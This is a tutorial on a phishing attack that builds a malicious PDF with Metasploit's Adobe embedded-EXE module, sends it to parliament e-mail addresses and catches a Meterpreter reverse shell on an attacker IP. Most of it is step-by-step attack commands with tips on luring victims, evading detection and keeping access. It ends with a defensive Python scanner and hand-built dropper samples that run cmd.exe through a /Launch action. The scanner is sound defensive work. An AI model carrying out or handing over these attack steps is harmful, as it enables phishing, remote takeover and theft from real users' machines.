Type : Tutorial
Level : Medium, Hard
Testing Platform : Win XP SP3, Windows 7
Vulnerable Application Tested : Adobe Reader 9.1
Some people say that the weakest link in security is the human. I would not call that wrong, because in practice the human often is the weakest link, but I would not call it entirely true either: often the human does not know what they are doing simply because nobody has told them.
In this tutorial I will demonstrate a client-side attack using the Adobe PDF embedded EXE vulnerability (the Metasploit module adobe_pdf_embedded_exe_nojs). Most Windows users have Adobe Reader (Acrobat Reader) installed on their computers or laptops, which makes a malicious PDF a convenient delivery vector.
If you followed the news a few weeks ago about the Australian parliament's computers being compromised by an unknown hacker: the attacker used a social engineering technique to gain access to parliament computers, and it was almost the same method used in this tutorial.
Okay, here is the scenario for this attack method:
1. The parliament has an e-mail address, let's say (firstname.lastname@example.org). Users of this kind (maybe about 80% of them) usually only know how to use a computer without knowing the risks; if there is any problem, they call IT support to fix the mess.
In this scenario the attacker (me) will use computer-based social engineering. After a few visits to Facebook and Google, plus some dumpster diving around the parliament office, the attacker has collected a list of parliament e-mail addresses.
2. An attacker machine running Windows or Linux with Metasploit installed (I'm using BackTrack 5 in this tutorial).
1. Generate the malicious PDF in msfconsole. Each command is followed by what it does:

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs --> Select the Adobe PDF embedded EXE exploit (the variant that does not rely on JavaScript)
set payload windows/meterpreter/reverse_tcp --> Set the payload so that a Meterpreter session connects back to us when the exploit succeeds
set filename Important_Meeting_Notice.pdf --> Make the file name as interesting as you can so the victim will open your malicious PDF
set lhost 192.168.8.92 --> Attacker IP address (change this to your own IP)
set lport 443 --> I'm using this port because outbound 443 (HTTPS) is almost always allowed through the victim's proxy or firewall :p (note that a plain reverse_tcp on 443 is not HTTPS, so a proxy that inspects traffic may still notice it)
exploit --> Generate the malicious PDF

After the malicious PDF is generated, it is stored on your local machine and msfconsole prints its path. I have highlighted it with a yellow marker; note the directory containing the malicious PDF file, you will need it in the next step.
2. The next step is sending the malicious PDF to the target e-mail address. In this case I send it to email@example.com (see the scenario above if you are still asking why).
3. After sending the malicious PDF we need to set up a listener to catch the reverse connection. We use msfconsole's multi/handler with the same payload, LHOST and LPORT that were set when the PDF was generated.
4. The victim (firstname.lastname@example.org) opens the e-mail and scans the attachment with their antivirus.
The antivirus finds nothing. (This was true when the tutorial was written; signature coverage changes over time, so do not count on it.)
5. When the victim opens the malicious PDF, Adobe Reader shows a warning dialog. The social engineering here is getting the victim to tick "Do not show this message again" and click Open.
6. As soon as the victim clicks the Open button, our listener catches the reverse connection.
Yep, we're in!
- After successfully performing this attack, migrate the Meterpreter session to Explorer.exe so the session survives the victim closing Adobe Reader (see steps 2 and 3 of the tutorial linked here).
1. When you open a file and an alert appears, read the alert carefully. Clicking "Next" or "OK" as soon as an alert appears is not always a good idea, especially when a PDF asks for permission to open or launch another program.
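Reading the alert is the human check; the technical check is to look inside the PDF before anyone opens it. The script below is an added example (it is not part of the original tutorial and not the Metasploit module's code): a small static triage tool in the spirit of pdfid that counts the names a Launch-action dropper depends on (/Launch, /EmbeddedFile, /OpenAction, and the JavaScript and /AA markers for completeness), resolves #xx escapes so /L#61unch is still recognised as /Launch, inflates FlateDecode streams so an object hidden in an object stream is not missed, and reports the program and arguments a /Launch action would run. The PDF samples are constructed by hand for this example (the Important_Meeting_Notice.exe name is only a placeholder); they imitate the object layout of such a dropper and are not files produced by the module.

```python
import re
import zlib

# Names whose presence in a PDF deserves a closer look. The embedded-EXE dropper
# described above needs /EmbeddedFile (to carry the payload) and /Launch (to run it);
# /OpenAction and /AA make an action fire automatically; /JS and /JavaScript mark script.
RISKY_NAMES = (b"/OpenAction", b"/AA", b"/Launch", b"/EmbeddedFile", b"/JS", b"/JavaScript")

_NAME_RE = re.compile(rb"/([A-Za-z0-9#_.\-]+)")               # a PDF name object
_HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")              # #xx escape inside a name
_STREAM_RE = re.compile(rb"stream\r?\n(.*?)\nendstream", re.S)  # stream body (lazy: first endstream)


def inflate_streams(data: bytes) -> bytes:
    """Concatenate the plaintext of every zlib (FlateDecode) stream in the file.
    Object streams (/ObjStm) can hide whole objects inside compressed data, so a scan
    of the raw bytes alone would miss a /Launch stored there."""
    chunks = []
    for m in _STREAM_RE.finditer(data):
        try:
            chunks.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # not a zlib stream (page content, images, the embedded EXE itself)
    return b"\n".join(chunks)


def normalize(data: bytes) -> bytes:
    """Raw bytes plus inflated streams, with #xx escapes in names resolved,
    so that /L#61unch is seen as /Launch."""
    text = data + b"\n" + inflate_streams(data)
    return _NAME_RE.sub(
        lambda m: b"/" + _HEX_ESCAPE_RE.sub(lambda h: bytes([int(h.group(1), 16)]), m.group(1)),
        text,
    )


def count_risky_names(data: bytes) -> dict:
    """Count each of RISKY_NAMES (exact match, so /EmbeddedFiles is not /EmbeddedFile)."""
    counts = {name: 0 for name in RISKY_NAMES}
    for m in _NAME_RE.finditer(normalize(data)):
        name = b"/" + m.group(1)
        if name in counts:
            counts[name] += 1
    return {name.decode(): n for name, n in counts.items()}


def launch_targets(data: bytes) -> list:
    """Return (/F, /P) of every /Launch action: the program and arguments Reader would run."""
    targets = []
    text = normalize(data)
    for m in re.finditer(rb"/S\s*/Launch\b", text):
        obj = text[m.end():]
        end = obj.find(b"endobj")          # stay inside the object that holds the action
        if end != -1:
            obj = obj[:end]
        f = re.search(rb"/F\s*\(([^)]*)\)", obj)
        p = re.search(rb"/P\s*\(([^)]*)\)", obj)
        targets.append((f.group(1).decode("latin-1") if f else None,
                        p.group(1).decode("latin-1") if p else None))
    return targets


def triage(data: bytes) -> dict:
    counts = count_risky_names(data)
    hits = {name: n for name, n in counts.items() if n}
    return {"suspicious": bool(hits), "hits": hits, "launch": launch_targets(data)}


# Constructed samples (hand-written for this example, not output of the Metasploit module).
BENIGN_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >>
endobj
4 0 obj
<< /Length 44 >>
stream
BT /F1 12 Tf 72 720 Td (Meeting notes) Tj ET
endstream
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

# Catalog /OpenAction -> /Launch action that starts an attachment carried as /EmbeddedFile.
SUSPICIOUS_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R
   /Names << /EmbeddedFiles << /Names [(Important_Meeting_Notice.exe) 6 0 R] >> >> >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>
endobj
5 0 obj
<< /Type /Action /S /Launch /Win << /F (cmd.exe) /P (/c start Important_Meeting_Notice.exe) >> >>
endobj
6 0 obj
<< /Type /Filespec /F (Important_Meeting_Notice.exe) /EF << /F 7 0 R >> >>
endobj
7 0 obj
<< /Type /EmbeddedFile /Length 4 >>
stream
MZ\x90\x00
endstream
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

# Same dropper with the key names hidden behind #xx escapes (a plain grep for /Launch fails).
OBFUSCATED_PDF = SUSPICIOUS_PDF.replace(b"/Launch", b"/L#61unch").replace(b"/OpenAction", b"/Open#41ction")

# Same action packed into a FlateDecode object stream (simplified /ObjStm, no offset table):
# the raw bytes never contain the text /Launch, only the inflated stream does.
_HIDDEN_OBJECT = b"5 0 obj\n<< /S /Launch /Win << /F (cmd.exe) /P (/c start x.exe) >> >>\nendobj"
_PACKED = zlib.compress(_HIDDEN_OBJECT)
OBJSTM_PDF = (
    b"%PDF-1.5\n1 0 obj\n<< /Type /Catalog /OpenAction 5 0 R >>\nendobj\n"
    + b"2 0 obj\n<< /Type /ObjStm /N 1 /Filter /FlateDecode /Length " + str(len(_PACKED)).encode()
    + b" >>\nstream\n" + _PACKED + b"\nendstream\nendobj\ntrailer\n<< /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for label, pdf in (("benign", BENIGN_PDF), ("launch", SUSPICIOUS_PDF),
                       ("obfuscated", OBFUSCATED_PDF), ("objstm", OBJSTM_PDF)):
        print(label, triage(pdf))
```

This is a heuristic, not a verdict: a hit means "open this in a sandbox or a viewer with Launch actions disabled", not "malware", and a miss means little, since it does not handle encrypted PDFs or filters other than FlateDecode. Run it over the attachment before it reaches the user, and you will see the /Launch pointing at cmd.exe that the antivirus in step 4 did not flag.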
Hope you enjoyed it!